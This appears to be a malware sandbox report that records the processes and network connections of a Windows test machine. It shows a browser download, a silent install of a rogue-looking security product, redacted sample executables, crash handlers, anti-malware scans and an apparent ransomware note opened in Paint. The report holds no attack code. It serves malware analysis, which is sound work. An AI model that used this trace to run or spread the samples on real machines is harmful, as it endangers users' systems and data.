"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2676 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3944 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3944 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5372 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5812 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5768 /prefetch:2
C:\Users\Admin\Documents\[email protected]
"C:\Users\Admin\Documents\[email protected]"
C:\Users\Admin\Documents\[email protected]
"C:\Users\Admin\Documents\[email protected]"
C:\Users\Admin\Documents\[email protected]
"C:\Users\Admin\Documents\[email protected]"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2172 -ip 2172
C:\Users\Admin\Documents\[email protected]
C:\Users\Admin\Documents\[email protected]
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 480
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"
C:\Program Files (x86)\Security Central\Security Central.exe
"C:\Program Files (x86)\Security Central\Security Central.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Program Files (x86)\Security Central\Security Central.exe
"C:\Program Files (x86)\Security Central\Security Central.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\explorer.exe
explorer.exe /LOADSAVEDWINDOWS
C:\Windows\system32\sihost.exe
sihost.exe
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\explorer.exe
explorer.exe /LOADSAVEDWINDOWS
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\explorer.exe
explorer.exe /LOADSAVEDWINDOWS
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe /LOADSAVEDWINDOWS
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 69979813E7C02FD336707CFA73C8ED85 E Global\MSI0000
C:\Windows\explorer.exe
explorer.exe /LOADSAVEDWINDOWS
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
C:\Users\Admin\Desktop\[email protected]
"C:\Users\Admin\Desktop\[email protected]"
C:\Users\Admin\AppData\Local\6AdwCleaner.exe
"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Public\Desktop\@[email protected]"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
C:\Program Files (x86)\Security Central\Security Central.exe
"C:\Program Files (x86)\Security Central\Security Central.exe"
C:\Program Files (x86)\Security Central\Security Central.exe
"C:\Program Files (x86)\Security Central\Security Central.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\096856908cd3419d9d9501e5eeded7dd /t 6464 /p 6460
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.180.14:443 | www.youtube.com | tcp |
| GB | 142.250.180.14:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.200.42:443 | content-autofill.googleapis.com | tcp |
| GB | 142.250.180.14:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | 14.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 137.126.19.2.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.com | udp |
| US | 34.149.2.250:443 | download.com | tcp |
| US | 34.149.2.250:443 | download.com | tcp |
| US | 8.8.8.8:53 | download.cnet.com | udp |
| US | 151.101.1.91:443 | download.cnet.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 250.2.149.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | at.adtech.redventures.io | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 8.8.8.8:53 | cdn.cohesionapps.com | udp |
| GB | 172.217.169.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 151.101.2.154:443 | at.adtech.redventures.io | tcp |
| US | 151.101.1.91:443 | download.cnet.com | udp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| ES | 18.172.213.84:443 | cdn.cohesionapps.com | tcp |
| GB | 172.217.169.34:443 | securepubads.g.doubleclick.net | udp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ingest.make.rvapps.io | udp |
| US | 8.8.8.8:53 | 52.177.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.213.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.213.172.18.in-addr.arpa | udp |
| US | 54.157.160.138:443 | ingest.make.rvapps.io | tcp |
| US | 54.157.160.138:443 | ingest.make.rvapps.io | tcp |
| US | 8.8.8.8:53 | cdn.confiant-integrations.net | udp |
| US | 151.101.2.154:443 | at.adtech.redventures.io | tcp |
| US | 104.18.43.90:443 | cdn.confiant-integrations.net | tcp |
| US | 54.157.160.138:443 | ingest.make.rvapps.io | tcp |
| US | 104.18.43.90:443 | cdn.confiant-integrations.net | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 104.18.32.137:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | spn-v1.revampcdn.com | udp |
| US | 151.101.1.91:443 | spn-v1.revampcdn.com | tcp |
| US | 8.8.8.8:53 | 138.160.157.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.43.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | z.moatads.com | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | download-bender.cnetstatic.com | udp |
| GB | 142.250.200.42:443 | content-autofill.googleapis.com | udp |
| GB | 96.16.109.251:443 | z.moatads.com | tcp |
| ES | 18.172.213.48:443 | sb.scorecardresearch.com | tcp |
| US | 199.232.194.154:443 | download-bender.cnetstatic.com | tcp |
| US | 199.232.194.154:443 | download-bender.cnetstatic.com | tcp |
| US | 199.232.194.154:443 | download-bender.cnetstatic.com | tcp |
| US | 199.232.194.154:443 | download-bender.cnetstatic.com | tcp |
| US | 199.232.194.154:443 | download-bender.cnetstatic.com | tcp |
| US | 199.232.194.154:443 | download-bender.cnetstatic.com | tcp |
| US | 8.8.8.8:53 | www.datadoghq-browser-agent.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| ES | 18.172.211.19:443 | www.datadoghq-browser-agent.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| GB | 96.16.109.251:443 | z.moatads.com | tcp |
| US | 8.8.8.8:53 | apps.cpi.arturito.cloud | udp |
| ES | 18.172.208.75:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | o348491.ingest.sentry.io | udp |
| US | 34.120.186.113:443 | apps.cpi.arturito.cloud | tcp |
| US | 34.120.195.249:443 | o348491.ingest.sentry.io | tcp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.adsensecustomsearchads.com | udp |
| GB | 142.250.178.14:443 | www.adsensecustomsearchads.com | tcp |
| US | 8.8.8.8:53 | 4.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.213.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.194.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.211.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.208.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.186.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.195.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.109.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| ES | 18.172.208.75:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | images.sftcdn.net | udp |
| ES | 18.172.226.117:443 | config.aps.amazon-adsystem.com | tcp |
| GB | 104.103.241.197:443 | images.sftcdn.net | tcp |
| GB | 104.103.241.197:443 | images.sftcdn.net | tcp |
| GB | 104.103.241.197:443 | images.sftcdn.net | tcp |
| GB | 104.103.241.197:443 | images.sftcdn.net | tcp |
| GB | 104.103.241.197:443 | images.sftcdn.net | tcp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| ES | 18.172.226.117:443 | config.aps.amazon-adsystem.com | tcp |
| GB | 104.103.241.197:443 | images.sftcdn.net | tcp |
| US | 8.8.8.8:53 | mb.moatads.com | udp |
| GB | 130.162.160.243:443 | mb.moatads.com | tcp |
| GB | 130.162.160.243:443 | mb.moatads.com | tcp |
| GB | 130.162.160.243:443 | mb.moatads.com | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.226.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.241.103.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.160.162.130.in-addr.arpa | udp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 8.8.8.8:53 | 86.53.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| ES | 18.172.217.30:443 | aax.amazon-adsystem.com | tcp |
| ES | 18.172.217.30:443 | aax.amazon-adsystem.com | tcp |
| ES | 18.172.217.30:443 | aax.amazon-adsystem.com | tcp |
| ES | 18.172.217.30:443 | aax.amazon-adsystem.com | tcp |
| ES | 18.172.217.30:443 | aax.amazon-adsystem.com | tcp |
| ES | 18.172.217.30:443 | aax.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| US | 8.8.8.8:53 | js-sec.indexww.com | udp |
| US | 172.64.149.180:443 | js-sec.indexww.com | tcp |
| GB | 23.39.224.128:443 | c.go-mpulse.net | tcp |
| US | 8.8.8.8:53 | monarch.cohesionapps.com | udp |
| US | 8.8.8.8:53 | privacyportal.onetrust.com | udp |
| US | 54.173.164.203:443 | monarch.cohesionapps.com | tcp |
| US | 8.8.8.8:53 | partner.googleadservices.com | udp |
| US | 104.18.32.137:443 | privacyportal.onetrust.com | tcp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | a001570fdc9f668e558b4a4f2f0df561.safeframe.googlesyndication.com | udp |
| GB | 172.217.16.226:443 | partner.googleadservices.com | tcp |
| DE | 162.19.138.117:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | 30.217.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.149.64.172.in-addr.arpa | udp |
| GB | 23.39.224.128:443 | c.go-mpulse.net | tcp |
| GB | 216.58.204.65:443 | a001570fdc9f668e558b4a4f2f0df561.safeframe.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | id.sv.rkdms.com | udp |
| US | 8.8.8.8:53 | api.rlcdn.com | udp |
| US | 8.8.8.8:53 | idx.liadm.com | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| GB | 216.58.212.193:443 | tpc.googlesyndication.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 44.216.212.178:443 | idx.liadm.com | tcp |
| US | 34.120.133.55:443 | api.rlcdn.com | tcp |
| DE | 162.19.138.83:443 | id5-sync.com | tcp |
| DE | 162.19.138.83:443 | id5-sync.com | tcp |
| US | 3.223.64.176:443 | id.sv.rkdms.com | tcp |
| GB | 23.39.224.128:443 | c.go-mpulse.net | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 216.58.212.193:443 | tpc.googlesyndication.com | udp |
| GB | 23.39.224.128:443 | c.go-mpulse.net | tcp |
| US | 8.8.8.8:53 | dis.eu.criteo.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| NL | 178.250.1.9:443 | dis.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | 2.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.164.173.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.224.39.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.133.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.40.223.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.212.216.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.64.223.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | ice.360yield.com | udp |
| IE | 63.32.195.109:443 | ice.360yield.com | tcp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| NL | 185.89.210.20:443 | ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | 9.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.49.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.195.32.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ce.lijit.com | udp |
| IE | 54.154.92.191:443 | ce.lijit.com | tcp |
| US | 8.8.8.8:53 | rtb.gumgum.com | udp |
| IE | 54.154.163.59:443 | rtb.gumgum.com | tcp |
| US | 8.8.8.8:53 | 02179916.akstat.io | udp |
| GB | 173.222.12.168:443 | 02179916.akstat.io | tcp |
| US | 8.8.8.8:53 | 20.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.92.154.54.in-addr.arpa | udp |
